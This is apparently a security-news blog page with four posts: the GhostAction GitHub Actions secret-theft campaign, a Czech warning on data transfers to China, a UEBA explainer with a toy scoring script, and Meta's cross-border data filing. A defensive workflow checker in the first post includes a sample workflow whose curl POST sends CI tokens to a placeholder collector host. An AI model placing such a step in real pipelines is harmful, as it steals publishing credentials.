Showing posts with label Data Transfer.

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 
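A defender reviewing workflow changes after an incident like this wants a fast, dependency-free check for the shape of file described above: a `run:` step that ships data to a host the repository never normally talks to, in a workflow that exposes secrets, and a new file that references every secret the repository's existing workflows use. The following is an added example written for this page, not GitGuardian's or GitHub's tooling; the allowlist of expected hosts, the regexes and the three sample workflows are constructed assumptions, and the collector hostname is a placeholder.

```python
"""Static checks for GitHub Actions workflow text (added example, not GitGuardian's or
GitHub's code). Flags the GhostAction-style pattern: secrets exposed to a run step that
pushes data to an unexpected host, and a workflow that enumerates every secret the repo
already uses. Sample workflows at the bottom are constructed for the demo."""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NETWORK_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")
# Hosts a publish/CI workflow is expected to reach (assumption; tune per repository).
EXPECTED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}


def extract_run_scripts(workflow_text):
    """Return the shell text of every `run:` step, including `run: |` block scalars."""
    lines = workflow_text.splitlines()
    scripts, i = [], 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        i += 1
        if not m:
            continue
        key_col = len(m.group(1)) + len(m.group(2) or "")  # column of the `run` key
        rest = m.group(3).strip()
        if rest and rest not in ("|", ">", "|-", ">-"):
            scripts.append(rest)  # single-line form: `run: cmd`
            continue
        body = []  # block scalar: keep lines indented deeper than the key
        while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > key_col):
            body.append(lines[i].strip())
            i += 1
        scripts.append("\n".join(body).strip())
    return scripts


def referenced_secrets(workflow_text):
    """Distinct ${{ secrets.NAME }} references, sorted."""
    return sorted(set(SECRET_REF.findall(workflow_text)))


def assess_workflow(workflow_text, existing_workflows=()):
    """Return secrets, findings and a verdict for one workflow file.
    `existing_workflows` holds the repo's other workflow texts, used to spot a new file
    that references every secret the repository already uses."""
    secrets = referenced_secrets(workflow_text)
    findings = []
    for script in extract_run_scripts(workflow_text):
        if not NETWORK_CMD.search(script):
            continue
        hosts = set(URL_HOST.findall(script)) - EXPECTED_HOSTS
        if secrets and hosts:
            findings.append("network step reaches unexpected host(s) %s while secrets are exposed"
                            % ", ".join(sorted(hosts)))
    known = set()
    for other in existing_workflows:
        known.update(referenced_secrets(other))
    if len(known) >= 2 and known <= set(secrets):
        findings.append("references all %d secrets used across existing workflows" % len(known))
    return {"secrets": secrets, "findings": findings, "suspicious": bool(findings)}


# Constructed sample workflows (not from any real repository).
BENIGN_WORKFLOW = """name: publish
on:
  release:
    types: [published]
jobs:
  pypi:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - run: python -m twine upload dist/*
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
"""
DOCKER_WORKFLOW = """name: image
on:
  push:
    branches: [main]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: docker login -u "$USER" -p "$PASS"
        env:
          USER: ${{ secrets.DOCKERHUB_USER }}
          PASS: ${{ secrets.DOCKERHUB_TOKEN }}
"""
SUSPICIOUS_WORKFLOW = """name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -s -X POST -d "p=$PYPI_TOKEN&d=$DOCKERHUB_TOKEN" https://collector.placeholder.invalid/
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          DOCKERHUB_USER: ${{ secrets.DOCKERHUB_USER }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
"""

if __name__ == "__main__":
    for name, text in [("benign", BENIGN_WORKFLOW), ("docker", DOCKER_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)]:
        print(name, assess_workflow(text, existing_workflows=[BENIGN_WORKFLOW, DOCKER_WORKFLOW]))
```

The host allowlist is deliberately short, so a legitimate step that calls some other API with a secret will also be flagged; that is the intended trade-off for a post-incident sweep, where each hit is reviewed by a person. Run it over every file under `.github/workflows/` in a commit range, and treat a new workflow that hits both findings at once as the highest-priority review item.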

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.

Czechia Warns of Chinese Data Transfers and Espionage Risks to Critical Infrastructure

Czechia’s National Cyber and Information Security Agency (NÚKIB) has issued a stark warning about rising cyber espionage campaigns linked to China and Russia, urging both government institutions and private companies to strengthen their security measures. The agency classified the threat as highly likely, citing particular concerns over data transfers to China and remote administration of assets from Chinese territories, including Hong Kong and Macau. According to the watchdog, these operations are part of long-term efforts by foreign states to compromise critical infrastructure, steal sensitive data, and undermine public trust. 

The agency’s concerns are rooted in China’s legal and regulatory framework, which it argues makes private data inherently insecure. Laws such as the National Intelligence Law of 2017 require all citizens and organizations to assist intelligence services, while the 2015 National Security Law and the 2013 Company Law provide broad avenues for state interference in corporate operations. Additionally, regulations introduced in 2021 obligate technology firms to report software vulnerabilities to government authorities within two days while prohibiting disclosure to foreign organizations. NÚKIB noted that these measures give Chinese state actors sweeping access to sensitive information, making foreign businesses and governments vulnerable if their data passes through Chinese systems. 

Hong Kong and Macau also fall under scrutiny in the agency’s assessment. In Hong Kong, the 2024 Safeguarding National Security Ordinance integrates Chinese security laws into its own legal system, broadening the definition of state secrets. Macau’s 2019 Cybersecurity Law grants authorities powers to monitor data transmissions from critical infrastructure in real time, with little oversight to prevent misuse. NÚKIB argues that these developments extend the Chinese government’s reach well beyond its mainland jurisdiction. 

The Czech warning gains credibility from recent attribution efforts. Earlier this year, Prague linked cyberattacks on its Ministry of Foreign Affairs to APT31, a group tied to China’s Ministry of State Security, in a campaign active since 2022. The government condemned the attacks as deliberate attempts to disrupt its institutions and confirmed a high degree of certainty about Chinese involvement, based on cooperation among domestic and international intelligence agencies. 

These warnings align with broader global moves to limit reliance on Chinese technologies. Countries such as Germany, Italy, and the Netherlands have already imposed restrictions, while the Five Eyes alliance has issued similar advisories. For Czechia, the implications are serious: NÚKIB highlighted risks across devices and systems such as smartphones, cloud services, photovoltaic inverters, and health technology, stressing that disruptions could have wide-reaching consequences. The agency’s message reflects an ongoing effort to secure its digital ecosystem against foreign influence, particularly as geopolitical tensions deepen in Europe.

UEBA: A Smarter Way to Fight AI-Driven Cyberattacks

As artificial intelligence (AI) advances, cyberattacks are becoming more sophisticated and harder to stop. Traditional security systems that protect company networks are no longer enough, especially when dealing with insider threats, stolen passwords, and attackers who move through systems unnoticed.

Recent studies warn that cybercriminals are using AI to make their attacks faster, smarter, and more damaging. These advanced attackers can now automate phishing emails and create malware that changes its form to avoid being caught. Some reports also show that AI is helping hackers quickly gather information and launch more targeted, widespread attacks.

To fight back, many security teams are now using a more intelligent system called User and Entity Behavior Analytics (UEBA). Instead of focusing only on known attack patterns, UEBA carefully tracks how users normally behave and quickly spots unusual activity that could signal a security problem.

How UEBA Works

Older security tools were based on fixed rules and could only catch threats that had been seen before. They often missed new or hidden attacks, especially when attackers used AI to disguise their moves.

UEBA changed the game by focusing on user behavior. It looks for sudden changes in the way people or systems normally act, which may point to a stolen account or an insider threat.

Today, UEBA uses machine learning to process huge amounts of data and recognize even small changes in behavior that may be too complex for traditional tools to catch.

Key Parts of UEBA

A typical UEBA system has four main steps:

1. Gathering Data: UEBA collects information from many places, including login records, security tools, VPNs, cloud services, and activity logs from different devices and applications.

2. Setting Normal Behavior: The system learns what is "normal" for each user or system—such as usual login times, commonly used apps, or regular network activities.

3. Spotting Unusual Activity: UEBA compares new actions to the learned patterns. It uses statistical and machine learning models to judge whether an action looks strange or risky, and assigns each unusual event a risk score based on its severity.

4. Responding to Risks: When something suspicious is found, the system can trigger alerts or take quick action like locking an account, isolating a device, or asking for extra security checks.

This approach helps security teams respond faster and more accurately to threats.

Why UEBA Matters

UEBA is especially useful in protecting sensitive information and managing user identities. It can quickly detect unusual activities such as unexpected data transfers or access from unfamiliar locations.

When used with identity management tools, UEBA can make access control smarter, allowing easy entry for low-risk users, asking for extra verification for medium risks, or blocking dangerous activities in real time.
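The four steps listed under "Key Parts of UEBA" and the tiered access decision described just above fit in a few dozen lines once reduced to their essentials. The following is an added illustration written for this page, not any vendor's product: it builds a per-user baseline from constructed login and transfer logs, scores new events for unusual hour, new country, new device and abnormal transfer volume, and maps the score to allow, step-up verification, or block. The weights, thresholds and sample events are assumptions chosen for the demo.

```python
"""Minimal UEBA pipeline (added example, not a vendor's implementation).
Steps: gather events -> learn per-user baseline -> score new events -> decide action.
All logs below are constructed; weights and thresholds are illustrative assumptions."""
from collections import Counter, defaultdict
from statistics import mean, pstdev

# Constructed baseline log: (user, hour_of_day, country, device, megabytes transferred)
BASELINE_EVENTS = [
    ("alice", 8, "CZ", "laptop-a1", 5), ("alice", 9, "CZ", "laptop-a1", 8),
    ("alice", 9, "CZ", "laptop-a1", 12), ("alice", 10, "CZ", "laptop-a1", 10),
    ("alice", 14, "CZ", "laptop-a1", 15), ("alice", 16, "CZ", "laptop-a1", 20),
    ("bob", 8, "DE", "ws-b7", 30), ("bob", 9, "DE", "ws-b7", 35),
    ("bob", 10, "DE", "ws-b7", 25), ("bob", 11, "DE", "ws-b7", 40),
]

# Illustrative weights (assumption): how much each anomaly adds to the risk score.
W_HOUR, W_COUNTRY, W_DEVICE, W_VOLUME = 30, 40, 20, 40
VOLUME_SIGMA = 3.0  # transfers more than 3 standard deviations above normal are anomalous


def build_baselines(events):
    """Step 2: learn what is normal for each user from historical events."""
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev[0]].append(ev)
    baselines = {}
    for user, evs in by_user.items():
        mbs = [ev[4] for ev in evs]
        baselines[user] = {
            "hours": Counter(ev[1] for ev in evs),
            "countries": {ev[2] for ev in evs},
            "devices": {ev[3] for ev in evs},
            "mb_mean": mean(mbs),
            "mb_std": pstdev(mbs),
        }
    return baselines


def score_event(event, baselines):
    """Step 3: compare one new event to the user's baseline; return (score, reasons)."""
    user, hour, country, device, mb = event
    base = baselines.get(user)
    if base is None:
        return 50, ["no baseline for user"]  # first-seen identity gets extra verification
    score, reasons = 0, []
    if all(abs(hour - h) > 1 for h in base["hours"]):
        score += W_HOUR
        reasons.append("unusual hour")
    if country not in base["countries"]:
        score += W_COUNTRY
        reasons.append("new country")
    if device not in base["devices"]:
        score += W_DEVICE
        reasons.append("new device")
    if base["mb_std"] > 0:
        z = (mb - base["mb_mean"]) / base["mb_std"]
    else:
        z = 0.0 if mb == base["mb_mean"] else float("inf")
    if z > VOLUME_SIGMA:
        score += W_VOLUME
        reasons.append("transfer volume far above normal")
    return min(score, 100), reasons


def decide(score):
    """Step 4: map a risk score to the tiered access decision."""
    if score < 25:
        return "allow"
    if score < 60:
        return "step-up verification"
    return "block and alert"


def triage(new_events, baselines):
    """Run scoring and decision for a batch of events; returns (event, score, decision, reasons)."""
    results = []
    for ev in new_events:
        score, reasons = score_event(ev, baselines)
        results.append((ev, score, decide(score), reasons))
    return results


# Constructed new events: routine login, late-night login, and a large transfer from a new country.
NEW_EVENTS = [
    ("alice", 10, "CZ", "laptop-a1", 9),
    ("alice", 22, "CZ", "laptop-a1", 6),
    ("alice", 2, "RO", "laptop-a1", 600),
    ("carol", 9, "CZ", "laptop-c3", 4),
]

if __name__ == "__main__":
    for ev, score, action, why in triage(NEW_EVENTS, build_baselines(BASELINE_EVENTS)):
        print(ev, score, action, why)
```

The third event is the case the text calls out: an unexpected data transfer from an unfamiliar location, which scores well past the block threshold. The false-alarm problem discussed under "Challenges" shows up directly in the weights: a single new device scores 20 here and is still allowed, so tuning those numbers against real traffic is where most of the deployment effort goes.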

Challenges in Using UEBA

While UEBA is a powerful tool, it comes with some difficulties. Companies need to collect data from many sources, which can be tricky if their systems are outdated or spread out. Also, building reliable "normal" behavior patterns can be hard in busy workplaces where people’s routines often change. This can lead to false alarms, especially in the early stages of using UEBA.

Despite these challenges, UEBA is becoming an important part of modern cybersecurity strategies.

Meta: Challenges in Data Transfer Between Countries May Affect Services

Meta said in a recent report that an inability to transfer data "between countries and regions" where the company operates could affect its ability to provide services to its users, and added that the issue could also affect its financial results.

Meta has reportedly been facing lawsuits in Europe, India, and other jurisdictions over WhatsApp's 2016 and 2021 updates to its terms of service and privacy policy.

In a statement provided on Wednesday, Meta wrote, "If we are unable to transfer data between and among countries and regions in which we operate, or if we are restricted from sharing data among our products and services, it could affect our ability to provide our services, the manner in which we provide our services or our ability to target ads, which could adversely affect our financial results."

The multinational conglomerate further noted that countries such as India and Turkey are reportedly considering enacting legislation that requires local data storage and processing.

Such laws "could increase the cost and complexity of delivering our services, cause us to cease the offering of our products and services in certain countries, or result in fines or other penalties," the company said in its Form 10-K filing.

The company has faced continuing legal and regulatory challenges in a number of jurisdictions, including India.

The Competition Commission of India is currently investigating Meta for alleged anti-competitive practices. In addition, the company is facing lawsuits over its unified payments interface (UPI) service, WhatsApp Pay.

Amid the ongoing investigations and legal actions, Amrita Mukherjee, Director, Legal, India operations, was reportedly let go as part of a recent series of layoffs. The layoffs are part of Meta's downsizing strategy, disclosed in March, which will affect some 10,000 employees worldwide.

The issue is especially significant for Meta because it has a substantial presence in India, with more than half a billion users of its services.

The company's daily active users (DAUs) grew by 4% to 2 billion on average through December 2022 from the previous year, according to its annual report. The top three countries for DAU growth during that time were Bangladesh, the Philippines, and India.